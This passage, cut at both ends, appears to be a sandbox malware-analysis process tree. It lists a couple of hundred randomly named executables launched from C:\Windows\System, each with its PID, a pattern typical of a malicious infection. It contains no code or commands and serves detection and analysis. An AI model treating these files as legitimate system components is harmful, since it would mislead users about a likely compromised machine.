  C:\Windows\System\JvrlIRn.exe
  2⤵
  PID:8156
- C:\Windows\System\DiLOYsJ.exe
  C:\Windows\System\DiLOYsJ.exe
  2⤵
  PID:7276
- C:\Windows\System\QQPNfGH.exe
  C:\Windows\System\QQPNfGH.exe
  2⤵
  PID:7296
- C:\Windows\System\NhdyyZf.exe
  C:\Windows\System\NhdyyZf.exe
  2⤵
  PID:7468
- C:\Windows\System\nxbyrgQ.exe
  C:\Windows\System\nxbyrgQ.exe
  2⤵
  PID:7536
- C:\Windows\System\RNiCDYy.exe
  C:\Windows\System\RNiCDYy.exe
  2⤵
  PID:7600
- C:\Windows\System\voBRnuU.exe
  C:\Windows\System\voBRnuU.exe
  2⤵
  PID:7700
- C:\Windows\System\OBVDBHz.exe
  C:\Windows\System\OBVDBHz.exe
  2⤵
  PID:7844
- C:\Windows\System\qBMmfev.exe
  C:\Windows\System\qBMmfev.exe
  2⤵
  PID:8096
- C:\Windows\System\KSKsEut.exe
  C:\Windows\System\KSKsEut.exe
  2⤵
  PID:7312
- C:\Windows\System\myRDOeX.exe
  C:\Windows\System\myRDOeX.exe
  2⤵
  PID:7688
- C:\Windows\System\GebaayV.exe
  C:\Windows\System\GebaayV.exe
  2⤵
  PID:8136
- C:\Windows\System\yuCXAtc.exe
  C:\Windows\System\yuCXAtc.exe
  2⤵
  PID:8204
- C:\Windows\System\wAmXbgG.exe
  C:\Windows\System\wAmXbgG.exe
  2⤵
  PID:8228
- C:\Windows\System\GqElJDp.exe
  C:\Windows\System\GqElJDp.exe
  2⤵
  PID:8252
- C:\Windows\System\xFEIYPo.exe
  C:\Windows\System\xFEIYPo.exe
  2⤵
  PID:8272
- C:\Windows\System\ISQDBJm.exe
  C:\Windows\System\ISQDBJm.exe
  2⤵
  PID:8312
- C:\Windows\System\VDpijaJ.exe
  C:\Windows\System\VDpijaJ.exe
  2⤵
  PID:8336
- C:\Windows\System\mfdvoaz.exe
  C:\Windows\System\mfdvoaz.exe
  2⤵
  PID:8356
- C:\Windows\System\ACDbVtB.exe
  C:\Windows\System\ACDbVtB.exe
  2⤵
  PID:8376
- C:\Windows\System\WAufXDt.exe
  C:\Windows\System\WAufXDt.exe
  2⤵
  PID:8404
- C:\Windows\System\tFhpdhe.exe
  C:\Windows\System\tFhpdhe.exe
  2⤵
  PID:8424
- C:\Windows\System\DRzhQbo.exe
  C:\Windows\System\DRzhQbo.exe
  2⤵
  PID:8448
- C:\Windows\System\TfIwBGU.exe
  C:\Windows\System\TfIwBGU.exe
  2⤵
  PID:8468
- C:\Windows\System\FFsizKH.exe
  C:\Windows\System\FFsizKH.exe
  2⤵
  PID:8488
- C:\Windows\System\mjdTVMV.exe
  C:\Windows\System\mjdTVMV.exe
  2⤵
  PID:8504
- C:\Windows\System\LpbgevF.exe
  C:\Windows\System\LpbgevF.exe
  2⤵
  PID:8524
- C:\Windows\System\mvIHulr.exe
  C:\Windows\System\mvIHulr.exe
  2⤵
  PID:8548
- C:\Windows\System\JibMwjV.exe
  C:\Windows\System\JibMwjV.exe
  2⤵
  PID:8564
- C:\Windows\System\cUBcWfk.exe
  C:\Windows\System\cUBcWfk.exe
  2⤵
  PID:8588
- C:\Windows\System\dKMLHZO.exe
  C:\Windows\System\dKMLHZO.exe
  2⤵
  PID:8616
- C:\Windows\System\UwpeDEz.exe
  C:\Windows\System\UwpeDEz.exe
  2⤵
  PID:8636
- C:\Windows\System\BMBMwKv.exe
  C:\Windows\System\BMBMwKv.exe
  2⤵
  PID:8792
- C:\Windows\System\fBaZjlk.exe
  C:\Windows\System\fBaZjlk.exe
  2⤵
  PID:8812
- C:\Windows\System\MwDBFxI.exe
  C:\Windows\System\MwDBFxI.exe
  2⤵
  PID:8832
- C:\Windows\System\QztuzjO.exe
  C:\Windows\System\QztuzjO.exe
  2⤵
  PID:8860
- C:\Windows\System\IDjGdxU.exe
  C:\Windows\System\IDjGdxU.exe
  2⤵
  PID:8876
- C:\Windows\System\lNdYgnk.exe
  C:\Windows\System\lNdYgnk.exe
  2⤵
  PID:8900
- C:\Windows\System\yaykptc.exe
  C:\Windows\System\yaykptc.exe
  2⤵
  PID:8960
- C:\Windows\System\FYdyqIw.exe
  C:\Windows\System\FYdyqIw.exe
  2⤵
  PID:8976
- C:\Windows\System\TgxahWn.exe
  C:\Windows\System\TgxahWn.exe
  2⤵
  PID:9000
- C:\Windows\System\bvMRLYq.exe
  C:\Windows\System\bvMRLYq.exe
  2⤵
  PID:9020
- C:\Windows\System\rJVeQBg.exe
  C:\Windows\System\rJVeQBg.exe
  2⤵
  PID:9048
- C:\Windows\System\tfhoTes.exe
  C:\Windows\System\tfhoTes.exe
  2⤵
  PID:9072
- C:\Windows\System\HLdHIQD.exe
  C:\Windows\System\HLdHIQD.exe
  2⤵
  PID:9104
- C:\Windows\System\FNTQFkr.exe
  C:\Windows\System\FNTQFkr.exe
  2⤵
  PID:9124
- C:\Windows\System\OmmgJEA.exe
  C:\Windows\System\OmmgJEA.exe
  2⤵
  PID:9156
- C:\Windows\System\AGUiKTD.exe
  C:\Windows\System\AGUiKTD.exe
  2⤵
  PID:9184
- C:\Windows\System\ktXaCIp.exe
  C:\Windows\System\ktXaCIp.exe
  2⤵
  PID:9200
- C:\Windows\System\xwifPxw.exe
  C:\Windows\System\xwifPxw.exe
  2⤵
  PID:7568
- C:\Windows\System\HknzDZo.exe
  C:\Windows\System\HknzDZo.exe
  2⤵
  PID:8224
- C:\Windows\System\bVhFhkM.exe
  C:\Windows\System\bVhFhkM.exe
  2⤵
  PID:8320
- C:\Windows\System\FrmPrVG.exe
  C:\Windows\System\FrmPrVG.exe
  2⤵
  PID:8420
- C:\Windows\System\pzwzGhS.exe
  C:\Windows\System\pzwzGhS.exe
  2⤵
  PID:8444
- C:\Windows\System\HMMuPbP.exe
  C:\Windows\System\HMMuPbP.exe
  2⤵
  PID:8532
- C:\Windows\System\VpZipXj.exe
  C:\Windows\System\VpZipXj.exe
  2⤵
  PID:8560
- C:\Windows\System\HitQGCl.exe
  C:\Windows\System\HitQGCl.exe
  2⤵
  PID:8708
- C:\Windows\System\pBGTlFH.exe
  C:\Windows\System\pBGTlFH.exe
  2⤵
  PID:8788
- C:\Windows\System\HSoxbYt.exe
  C:\Windows\System\HSoxbYt.exe
  2⤵
  PID:7508
- C:\Windows\System\BHVGyIa.exe
  C:\Windows\System\BHVGyIa.exe
  2⤵
  PID:8872
- C:\Windows\System\aWtdNzU.exe
  C:\Windows\System\aWtdNzU.exe
  2⤵
  PID:8972
- C:\Windows\System\fgdRAtd.exe
  C:\Windows\System\fgdRAtd.exe
  2⤵
  PID:8968
- C:\Windows\System\bjcvBSV.exe
  C:\Windows\System\bjcvBSV.exe
  2⤵
  PID:9012
- C:\Windows\System\PknCCff.exe
  C:\Windows\System\PknCCff.exe
  2⤵
  PID:9096
- C:\Windows\System\TqEcScZ.exe
  C:\Windows\System\TqEcScZ.exe
  2⤵
  PID:8572
- C:\Windows\System\ZAqjhKs.exe
  C:\Windows\System\ZAqjhKs.exe
  2⤵
  PID:9196
- C:\Windows\System\zuRgjDo.exe
  C:\Windows\System\zuRgjDo.exe
  2⤵
  PID:8248
- C:\Windows\System\lzFGCWG.exe
  C:\Windows\System\lzFGCWG.exe
  2⤵
  PID:9192
- C:\Windows\System\KYbwFtd.exe
  C:\Windows\System\KYbwFtd.exe
  2⤵
  PID:9120
- C:\Windows\System\qLxrYrT.exe
  C:\Windows\System\qLxrYrT.exe
  2⤵
  PID:8028
- C:\Windows\System\aouepop.exe
  C:\Windows\System\aouepop.exe
  2⤵
  PID:8304
- C:\Windows\System\NZGSgbR.exe
  C:\Windows\System\NZGSgbR.exe
  2⤵
  PID:8824
- C:\Windows\System\cPIweXZ.exe
  C:\Windows\System\cPIweXZ.exe
  2⤵
  PID:9232
- C:\Windows\System\UTNKVOX.exe
  C:\Windows\System\UTNKVOX.exe
  2⤵
  PID:9248
- C:\Windows\System\WwSwPGu.exe
  C:\Windows\System\WwSwPGu.exe
  2⤵
  PID:9264
- C:\Windows\System\mBshtrn.exe
  C:\Windows\System\mBshtrn.exe
  2⤵
  PID:9280
- C:\Windows\System\DZGawXo.exe
  C:\Windows\System\DZGawXo.exe
  2⤵
  PID:9296
- C:\Windows\System\AFuTrpT.exe
  C:\Windows\System\AFuTrpT.exe
  2⤵
  PID:9316
- C:\Windows\System\xunZIQG.exe
  C:\Windows\System\xunZIQG.exe
  2⤵
  PID:9332
- C:\Windows\System\yUTHtIy.exe
  C:\Windows\System\yUTHtIy.exe
  2⤵
  PID:9452
- C:\Windows\System\BYUniGf.exe
  C:\Windows\System\BYUniGf.exe
  2⤵
  PID:9484
- C:\Windows\System\yjzUzEz.exe
  C:\Windows\System\yjzUzEz.exe
  2⤵
  PID:9552
- C:\Windows\System\PkYgqRR.exe
  C:\Windows\System\PkYgqRR.exe
  2⤵
  PID:9572
- C:\Windows\System\lpDOiqo.exe
  C:\Windows\System\lpDOiqo.exe
  2⤵
  PID:9596
- C:\Windows\System\zDAfUjD.exe
  C:\Windows\System\zDAfUjD.exe
  2⤵
  PID:9632
- C:\Windows\System\ISHoctd.exe
  C:\Windows\System\ISHoctd.exe
  2⤵
  PID:9656
- C:\Windows\System\GeHxKIU.exe
  C:\Windows\System\GeHxKIU.exe
  2⤵
  PID:9676
- C:\Windows\System\pRwELmN.exe
  C:\Windows\System\pRwELmN.exe
  2⤵
  PID:9700
- C:\Windows\System\LwzSeKZ.exe
  C:\Windows\System\LwzSeKZ.exe
  2⤵
  PID:9736
- C:\Windows\System\NmMhbhD.exe
  C:\Windows\System\NmMhbhD.exe
  2⤵
  PID:9760
- C:\Windows\System\aZsWAdY.exe
  C:\Windows\System\aZsWAdY.exe
  2⤵
  PID:9812
- C:\Windows\System\uigxaph.exe
  C:\Windows\System\uigxaph.exe
  2⤵
  PID:9828
- C:\Windows\System\kEWYQBX.exe
  C:\Windows\System\kEWYQBX.exe
  2⤵
  PID:9852
- C:\Windows\System\UBZWWao.exe
  C:\Windows\System\UBZWWao.exe
  2⤵
  PID:9892
- C:\Windows\System\XZdIZLl.exe
  C:\Windows\System\XZdIZLl.exe
  2⤵
  PID:9912
- C:\Windows\System\vnFofAH.exe
  C:\Windows\System\vnFofAH.exe
  2⤵
  PID:9932
- C:\Windows\System\rbhUyKl.exe
  C:\Windows\System\rbhUyKl.exe
  2⤵
  PID:9952
- C:\Windows\System\GJQllWX.exe
  C:\Windows\System\GJQllWX.exe
  2⤵
  PID:9976
- C:\Windows\System\JcAOrEZ.exe
  C:\Windows\System\JcAOrEZ.exe
  2⤵
  PID:9996
- C:\Windows\System\MKLijqk.exe
  C:\Windows\System\MKLijqk.exe
  2⤵
  PID:10064
- C:\Windows\System\yMIzcju.exe
  C:\Windows\System\yMIzcju.exe
  2⤵
  PID:10084
- C:\Windows\System\lLWHhzQ.exe
  C:\Windows\System\lLWHhzQ.exe
  2⤵
  PID:10108
- C:\Windows\System\yBvkWfy.exe
  C:\Windows\System\yBvkWfy.exe
  2⤵
  PID:10144
- C:\Windows\System\FhuEWzS.exe
  C:\Windows\System\FhuEWzS.exe
  2⤵
  PID:10164
- C:\Windows\System\PFxfSbq.exe
  C:\Windows\System\PFxfSbq.exe
  2⤵
  PID:10192
- C:\Windows\System\VAdykRy.exe
  C:\Windows\System\VAdykRy.exe
  2⤵
  PID:10212
- C:\Windows\System\aGsHEOp.exe
  C:\Windows\System\aGsHEOp.exe
  2⤵
  PID:10232
- C:\Windows\System\fgzCRns.exe
  C:\Windows\System\fgzCRns.exe
  2⤵
  PID:9040
- C:\Windows\System\UQNAysO.exe
  C:\Windows\System\UQNAysO.exe
  2⤵
  PID:8348
- C:\Windows\System\aIcqsEx.exe
  C:\Windows\System\aIcqsEx.exe
  2⤵
  PID:8392
- C:\Windows\System\IWPtYCn.exe
  C:\Windows\System\IWPtYCn.exe
  2⤵
  PID:8776
- C:\Windows\System\bjJhLtT.exe
  C:\Windows\System\bjJhLtT.exe
  2⤵
  PID:9088
- C:\Windows\System\hApfUCl.exe
  C:\Windows\System\hApfUCl.exe
  2⤵
  PID:8804
- C:\Windows\System\ftoKlSj.exe
  C:\Windows\System\ftoKlSj.exe
  2⤵
  PID:9524
- C:\Windows\System\xXUCHaa.exe
  C:\Windows\System\xXUCHaa.exe
  2⤵
  PID:9604
- C:\Windows\System\MJctPaD.exe
  C:\Windows\System\MJctPaD.exe
  2⤵
  PID:9564
- C:\Windows\System\CiUDBKT.exe
  C:\Windows\System\CiUDBKT.exe
  2⤵
  PID:9592
- C:\Windows\System\kpATrIN.exe
  C:\Windows\System\kpATrIN.exe
  2⤵
  PID:9668
- C:\Windows\System\PzZJwLc.exe
  C:\Windows\System\PzZJwLc.exe
  2⤵
  PID:9772
- C:\Windows\System\zZEsFhZ.exe
  C:\Windows\System\zZEsFhZ.exe
  2⤵
  PID:9804
- C:\Windows\System\bXNjoCZ.exe
  C:\Windows\System\bXNjoCZ.exe
  2⤵
  PID:9920
- C:\Windows\System\mwKtSbr.exe
  C:\Windows\System\mwKtSbr.exe
  2⤵
  PID:9944
- C:\Windows\System\uaCPcGy.exe
  C:\Windows\System\uaCPcGy.exe
  2⤵
  PID:9988
- C:\Windows\System\bUumBsm.exe
  C:\Windows\System\bUumBsm.exe
  2⤵
  PID:10056
- C:\Windows\System\LYHLHLK.exe
  C:\Windows\System\LYHLHLK.exe
  2⤵
  PID:10180
- C:\Windows\System\xTguDgj.exe
  C:\Windows\System\xTguDgj.exe
  2⤵
  PID:10172
- C:\Windows\System\dmvOkCP.exe
  C:\Windows\System\dmvOkCP.exe
  2⤵
  PID:8868
- C:\Windows\System\NWZkpcV.exe
  C:\Windows\System\NWZkpcV.exe
  2⤵
  PID:8764
- C:\Windows\System\VizpBeS.exe
  C:\Windows\System\VizpBeS.exe
  2⤵
  PID:9460
- C:\Windows\System\ZiANBhw.exe
  C:\Windows\System\ZiANBhw.exe
  2⤵
  PID:9612
- C:\Windows\System\Amdwukp.exe
  C:\Windows\System\Amdwukp.exe
  2⤵
  PID:2212
- C:\Windows\System\peerTuH.exe
  C:\Windows\System\peerTuH.exe
  2⤵
  PID:9848
- C:\Windows\System\XJpJYbh.exe
  C:\Windows\System\XJpJYbh.exe
  2⤵
  PID:9904
- C:\Windows\System\amhLhVT.exe
  C:\Windows\System\amhLhVT.exe
  2⤵
  PID:8516
- C:\Windows\System\YWQypys.exe
  C:\Windows\System\YWQypys.exe
  2⤵
  PID:8292
- C:\Windows\System\NYCmyQs.exe
  C:\Windows\System\NYCmyQs.exe
  2⤵
  PID:9308
- C:\Windows\System\RfILqAS.exe
  C:\Windows\System\RfILqAS.exe
  2⤵
  PID:9732
- C:\Windows\System\UuLLCot.exe
  C:\Windows\System\UuLLCot.exe
  2⤵
  PID:9836
- C:\Windows\System\XtyFGzJ.exe
  C:\Windows\System\XtyFGzJ.exe
  2⤵
  PID:10228
- C:\Windows\System\ylWyqPk.exe
  C:\Windows\System\ylWyqPk.exe
  2⤵
  PID:10244
- C:\Windows\System\xfJKHBP.exe
  C:\Windows\System\xfJKHBP.exe
  2⤵
  PID:10264
- C:\Windows\System\TiLQYkG.exe
  C:\Windows\System\TiLQYkG.exe
  2⤵
  PID:10292
- C:\Windows\System\XTyzsbJ.exe
  C:\Windows\System\XTyzsbJ.exe
  2⤵
  PID:10312
- C:\Windows\System\oBNeVOk.exe
  C:\Windows\System\oBNeVOk.exe
  2⤵
  PID:10332
- C:\Windows\System\tMtNRtK.exe
  C:\Windows\System\tMtNRtK.exe
  2⤵
  PID:10360
- C:\Windows\System\hKsmzsG.exe
  C:\Windows\System\hKsmzsG.exe
  2⤵
  PID:10408
- C:\Windows\System\GdhaQBM.exe
  C:\Windows\System\GdhaQBM.exe
  2⤵
  PID:10444
- C:\Windows\System\yNcPpJK.exe
  C:\Windows\System\yNcPpJK.exe
  2⤵
  PID:10464
- C:\Windows\System\PSEUFUG.exe
  C:\Windows\System\PSEUFUG.exe
  2⤵
  PID:10492
- C:\Windows\System\fNVpixc.exe
  C:\Windows\System\fNVpixc.exe
  2⤵
  PID:10512
- C:\Windows\System\kPYzKMr.exe
  C:\Windows\System\kPYzKMr.exe
  2⤵
  PID:10532
- C:\Windows\System\oyKUlnP.exe
  C:\Windows\System\oyKUlnP.exe
  2⤵
  PID:10552
- C:\Windows\System\YMiQKFF.exe
  C:\Windows\System\YMiQKFF.exe
  2⤵
  PID:10572
- C:\Windows\System\BlNQorB.exe
  C:\Windows\System\BlNQorB.exe
  2⤵
  PID:10592
- C:\Windows\System\ERosEHP.exe
  C:\Windows\System\ERosEHP.exe
  2⤵
  PID:10624
- C:\Windows\System\qaNJfIJ.exe
  C:\Windows\System\qaNJfIJ.exe
  2⤵
  PID:10692
- C:\Windows\System\qEgLbzK.exe
  C:\Windows\System\qEgLbzK.exe
  2⤵
  PID:10720
- C:\Windows\System\bjkOMBa.exe
  C:\Windows\System\bjkOMBa.exe
  2⤵
  PID:10764
- C:\Windows\System\seLshZr.exe
  C:\Windows\System\seLshZr.exe
  2⤵
  PID:10792
- C:\Windows\System\XxoCuio.exe
  C:\Windows\System\XxoCuio.exe
  2⤵
  PID:10812
- C:\Windows\System\cgOCnid.exe
  C:\Windows\System\cgOCnid.exe
  2⤵
  PID:10832
- C:\Windows\System\CHBVbrH.exe
  C:\Windows\System\CHBVbrH.exe
  2⤵
  PID:10852
- C:\Windows\System\jeUssEP.exe
  C:\Windows\System\jeUssEP.exe
  2⤵
  PID:10872
- C:\Windows\System\YFSlpDk.exe
  C:\Windows\System\YFSlpDk.exe
  2⤵
  PID:10892
- C:\Windows\System\GxwxuNq.exe
  C:\Windows\System\GxwxuNq.exe
  2⤵
  PID:10912
- C:\Windows\System\hLkMAfI.exe
  C:\Windows\System\hLkMAfI.exe
  2⤵
  PID:10928
- C:\Windows\System\aFNbNAO.exe
  C:\Windows\System\aFNbNAO.exe
  2⤵
  PID:10964
- C:\Windows\System\KSxyOuR.exe
  C:\Windows\System\KSxyOuR.exe
  2⤵
  PID:10984
- C:\Windows\System\TXWNtLI.exe
  C:\Windows\System\TXWNtLI.exe
  2⤵
  PID:11024
- C:\Windows\System\rPIMoDm.exe
  C:\Windows\System\rPIMoDm.exe
  2⤵
  PID:11040
- C:\Windows\System\ijNcPHK.exe
  C:\Windows\System\ijNcPHK.exe
  2⤵
  PID:11060
- C:\Windows\System\lrdGpLe.exe
  C:\Windows\System\lrdGpLe.exe
  2⤵
  PID:11120
- C:\Windows\System\XsLOXlS.exe
  C:\Windows\System\XsLOXlS.exe
  2⤵
  PID:11140
- C:\Windows\System\HAVzQHl.exe
  C:\Windows\System\HAVzQHl.exe
  2⤵
  PID:11184
- C:\Windows\System\vgVgRjC.exe
  C:\Windows\System\vgVgRjC.exe
  2⤵
  PID:11228
- C:\Windows\System\gUnIfoU.exe
  C:\Windows\System\gUnIfoU.exe
  2⤵
  PID:10160
- C:\Windows\System\ZoIXsfU.exe
  C:\Windows\System\ZoIXsfU.exe
  2⤵
  PID:10280
- C:\Windows\System\nqzaTQS.exe
  C:\Windows\System\nqzaTQS.exe
  2⤵
  PID:10308
- C:\Windows\System\Iddyidp.exe
  C:\Windows\System\Iddyidp.exe
  2⤵
  PID:10396
- C:\Windows\System\ZmfLOnQ.exe
  C:\Windows\System\ZmfLOnQ.exe
  2⤵
  PID:10456
- C:\Windows\System\ATyICro.exe
  C:\Windows\System\ATyICro.exe
  2⤵
  PID:10540
- C:\Windows\System\PIwmpFL.exe
  C:\Windows\System\PIwmpFL.exe
  2⤵
  PID:10500
- C:\Windows\System\LbSnXTM.exe
  C:\Windows\System\LbSnXTM.exe
  2⤵
  PID:10560
- C:\Windows\System\ozCuNND.exe
  C:\Windows\System\ozCuNND.exe
  2⤵
  PID:9340
- C:\Windows\System\iZokTVW.exe
  C:\Windows\System\iZokTVW.exe
  2⤵
  PID:10788
- C:\Windows\System\BKpsEiQ.exe
  C:\Windows\System\BKpsEiQ.exe
  2⤵
  PID:10848
- C:\Windows\System\yyrVkNc.exe
  C:\Windows\System\yyrVkNc.exe
  2⤵
  PID:10828
- C:\Windows\System\IjzONqk.exe
  C:\Windows\System\IjzONqk.exe
  2⤵
  PID:10940
- C:\Windows\System\FSwxcgJ.exe
  C:\Windows\System\FSwxcgJ.exe
  2⤵
  PID:11020
- C:\Windows\System\SotZLdf.exe
  C:\Windows\System\SotZLdf.exe
  2⤵
  PID:11052
- C:\Windows\System\CTTyUpI.exe
  C:\Windows\System\CTTyUpI.exe
  2⤵
  PID:11148
- C:\Windows\System\soxKwus.exe
  C:\Windows\System\soxKwus.exe
  2⤵
  PID:10272
- C:\Windows\System\iHOgmDt.exe
  C:\Windows\System\iHOgmDt.exe
  2⤵
  PID:10304
- C:\Windows\System\OmgXEBE.exe
  C:\Windows\System\OmgXEBE.exe
  2⤵
  PID:10432
- C:\Windows\System\TqAfOLP.exe
  C:\Windows\System\TqAfOLP.exe
  2⤵
  PID:10640
- C:\Windows\System\FKjvSpb.exe
  C:\Windows\System\FKjvSpb.exe
  2⤵
  PID:10708
- C:\Windows\System\ySKvpan.exe
  C:\Windows\System\ySKvpan.exe
  2⤵
  PID:10980
- C:\Windows\System\avVhVCm.exe
  C:\Windows\System\avVhVCm.exe
  2⤵
  PID:11012
- C:\Windows\System\KFuYyOh.exe
  C:\Windows\System\KFuYyOh.exe
  2⤵
  PID:11156
- C:\Windows\System\rnsKEiz.exe
  C:\Windows\System\rnsKEiz.exe
  2⤵
  PID:10680
- C:\Windows\System\zPlpbsC.exe
  C:\Windows\System\zPlpbsC.exe
  2⤵
  PID:10976
- C:\Windows\System\alkxyaT.exe
  C:\Windows\System\alkxyaT.exe
  2⤵
  PID:10584
- C:\Windows\System\SRcWGql.exe
  C:\Windows\System\SRcWGql.exe
  2⤵
  PID:10460
- C:\Windows\System\tytCles.exe
  C:\Windows\System\tytCles.exe
  2⤵
  PID:11280
- C:\Windows\System\UNnuWMz.exe
  C:\Windows\System\UNnuWMz.exe
  2⤵
  PID:11300
- C:\Windows\System\KNgfDDD.exe
  C:\Windows\System\KNgfDDD.exe
  2⤵
  PID:11328
- C:\Windows\System\uRaIOCi.exe
  C:\Windows\System\uRaIOCi.exe
  2⤵
  PID:11348
- C:\Windows\System\vGFZpKv.exe
  C:\Windows\System\vGFZpKv.exe
  2⤵
  PID:11372
- C:\Windows\System\lkuiSgR.exe
  C:\Windows\System\lkuiSgR.exe
  2⤵
  PID:11412
- C:\Windows\System\pYvQTxi.exe
  C:\Windows\System\pYvQTxi.exe
  2⤵
  PID:11428
- C:\Windows\System\yUsUdWb.exe
  C:\Windows\System\yUsUdWb.exe
  2⤵
  PID:11460
- C:\Windows\System\DSxyNgG.exe
  C:\Windows\System\DSxyNgG.exe
  2⤵
  PID:11484
- C:\Windows\System\oLSMyHG.exe
  C:\Windows\System\oLSMyHG.exe
  2⤵
  PID:11504
- C:\Windows\System\mAjdZAx.exe
  C:\Windows\System\mAjdZAx.exe
  2⤵
  PID:11552
- C:\Windows\System\WGKwIvQ.exe
  C:\Windows\System\WGKwIvQ.exe
  2⤵
  PID:11572
- C:\Windows\System\SyvLnCp.exe
  C:\Windows\System\SyvLnCp.exe
  2⤵
  PID:11612
- C:\Windows\System\GIOgoIk.exe
  C:\Windows\System\GIOgoIk.exe
  2⤵
  PID:11632
- C:\Windows\System\PruPaTc.exe
  C:\Windows\System\PruPaTc.exe
  2⤵
  PID:11656
- C:\Windows\System\vkOCZiz.exe
  C:\Windows\System\vkOCZiz.exe
  2⤵
  PID:11680
- C:\Windows\System\JbLjfKk.exe
  C:\Windows\System\JbLjfKk.exe
  2⤵
  PID:11704
- C:\Windows\System\FLcrCXF.exe
  C:\Windows\System\FLcrCXF.exe
  2⤵
  PID:11752
- C:\Windows\System\CytcweP.exe
  C:\Windows\System\CytcweP.exe
  2⤵
  PID:11768
- C:\Windows\System\ZrdNOCP.exe
  C:\Windows\System\ZrdNOCP.exe
  2⤵
  PID:11788
- C:\Windows\System\imOMhMl.exe
  C:\Windows\System\imOMhMl.exe
  2⤵
  PID:11808
- C:\Windows\System\RRbuxMc.exe
  C:\Windows\System\RRbuxMc.exe
  2⤵
  PID:11852
- C:\Windows\System\ApNdlWs.exe
  C:\Windows\System\ApNdlWs.exe
  2⤵
  PID:11892
- C:\Windows\System\qTymxVa.exe
  C:\Windows\System\qTymxVa.exe
  2⤵
  PID:11920
- C:\Windows\System\EKOBNYw.exe
  C:\Windows\System\EKOBNYw.exe
  2⤵
  PID:11944
- C:\Windows\System\TyaTXFB.exe
  C:\Windows\System\TyaTXFB.exe
  2⤵
  PID:11964
- C:\Windows\System\UYznkhd.exe
  C:\Windows\System\UYznkhd.exe
  2⤵
  PID:11980
- C:\Windows\System\mqoMhoh.exe
  C:\Windows\System\mqoMhoh.exe
  2⤵
  PID:12000
- C:\Windows\System\ASjQSvt.exe
  C:\Windows\System\ASjQSvt.exe
  2⤵
  PID:12028
- C:\Windows\System\KqDOlOp.exe
  C:\Windows\System\KqDOlOp.exe
  2⤵
  PID:12052
- C:\Windows\System\wiiWUZP.exe
  C:\Windows\System\wiiWUZP.exe
  2⤵
  PID:12068
- C:\Windows\System\IGdpyGZ.exe
  C:\Windows\System\IGdpyGZ.exe
  2⤵
  PID:12120
- C:\Windows\System\qWctLtr.exe
  C:\Windows\System\qWctLtr.exe
  2⤵
  PID:12148
- C:\Windows\System\IHgkkTr.exe
  C:\Windows\System\IHgkkTr.exe
  2⤵
  PID:12176
- C:\Windows\System\odSlyBo.exe
  C:\Windows\System\odSlyBo.exe
  2⤵
  PID:12228
- C:\Windows\System\UbjtcAe.exe
  C:\Windows\System\UbjtcAe.exe
  2⤵
  PID:12256
- C:\Windows\System\GcVfjEW.exe
  C:\Windows\System\GcVfjEW.exe
  2⤵
  PID:12284
- C:\Windows\System\JdAMNgx.exe
  C:\Windows\System\JdAMNgx.exe
  2⤵
  PID:11292
- C:\Windows\System\YhGSsve.exe
  C:\Windows\System\YhGSsve.exe
  2⤵
  PID:11340
- C:\Windows\System\xynitVJ.exe
  C:\Windows\System\xynitVJ.exe
  2⤵
  PID:11364
- C:\Windows\System\BAHvfQg.exe
  C:\Windows\System\BAHvfQg.exe
  2⤵
  PID:11404
- C:\Windows\System\oMigmmS.exe
  C:\Windows\System\oMigmmS.exe
  2⤵
  PID:11476
- C:\Windows\System\hxpXdtz.exe
  C:\Windows\System\hxpXdtz.exe
  2⤵
  PID:11540
- C:\Windows\System\zdjCAdz.exe
  C:\Windows\System\zdjCAdz.exe
  2⤵
  PID:11628
- C:\Windows\System\ydnQEam.exe
  C:\Windows\System\ydnQEam.exe
  2⤵
  PID:11748
- C:\Windows\System\iBxvQjn.exe
  C:\Windows\System\iBxvQjn.exe
  2⤵
  PID:11900
- C:\Windows\System\CTHnNeV.exe
  C:\Windows\System\CTHnNeV.exe
  2⤵
  PID:4852
- C:\Windows\System\kkHvBtC.exe
  C:\Windows\System\kkHvBtC.exe
  2⤵
  PID:4840
- C:\Windows\System\CPhHbwo.exe
  C:\Windows\System\CPhHbwo.exe
  2⤵
  PID:5044
- C:\Windows\System\BbPTNfJ.exe
  C:\Windows\System\BbPTNfJ.exe
  2⤵
  PID:12064
- C:\Windows\System\qZlCNqd.exe
  C:\Windows\System\qZlCNqd.exe
  2⤵
  PID:12024
- C:\Windows\System\LNkdenQ.exe
  C:\Windows\System\LNkdenQ.exe
  2⤵
  PID:12200
- C:\Windows\System\tRYgLJs.exe
  C:\Windows\System\tRYgLJs.exe
  2⤵
  PID:12252
- C:\Windows\System\vGmxlnD.exe
  C:\Windows\System\vGmxlnD.exe
  2⤵
  PID:11180
- C:\Windows\System\AZURYzd.exe
  C:\Windows\System\AZURYzd.exe
  2⤵
  PID:11368
- C:\Windows\System\kxKnUXS.exe
  C:\Windows\System\kxKnUXS.exe
  2⤵
  PID:11692
- C:\Windows\System\ZPdIGoy.exe
  C:\Windows\System\ZPdIGoy.exe
  2⤵
  PID:11800
- C:\Windows\System\SNGkbGt.exe
  C:\Windows\System\SNGkbGt.exe
  2⤵
  PID:11836
- C:\Windows\System\twqxaur.exe
  C:\Windows\System\twqxaur.exe
  2⤵
  PID:11952
- C:\Windows\System\DNJfBVt.exe
  C:\Windows\System\DNJfBVt.exe
  2⤵
  PID:12088
- C:\Windows\System\OkFmxNP.exe
  C:\Windows\System\OkFmxNP.exe
  2⤵
  PID:12216
- C:\Windows\System\EBvtCuU.exe
  C:\Windows\System\EBvtCuU.exe
  2⤵
  PID:11420
- C:\Windows\System\hoXzqRf.exe
  C:\Windows\System\hoXzqRf.exe
  2⤵
  PID:11624
- C:\Windows\System\WMSLZtB.exe
  C:\Windows\System\WMSLZtB.exe
  2⤵
  PID:12008
- C:\Windows\System\EEkAqpq.exe
  C:\Windows\System\EEkAqpq.exe
  2⤵
  PID:12220
- C:\Windows\System\JaLKRhM.exe
  C:\Windows\System\JaLKRhM.exe
  2⤵
  PID:11740
- C:\Windows\System\RlWNLpT.exe
  C:\Windows\System\RlWNLpT.exe
  2⤵
  PID:12296
- C:\Windows\System\rQbqywy.exe
  C:\Windows\System\rQbqywy.exe
  2⤵
  PID:12372
- C:\Windows\System\dZjttSr.exe
  C:\Windows\System\dZjttSr.exe
  2⤵
  PID:12388
- C:\Windows\System\NFMNweJ.exe
  C:\Windows\System\NFMNweJ.exe
  2⤵
  PID:12408
- C:\Windows\System\DxBCuaK.exe
  C:\Windows\System\DxBCuaK.exe
  2⤵
  PID:12436
- C:\Windows\System\sjmdWMf.exe
  C:\Windows\System\sjmdWMf.exe
  2⤵
  PID:12464
- C:\Windows\System\TRfPDue.exe
  C:\Windows\System\TRfPDue.exe
  2⤵
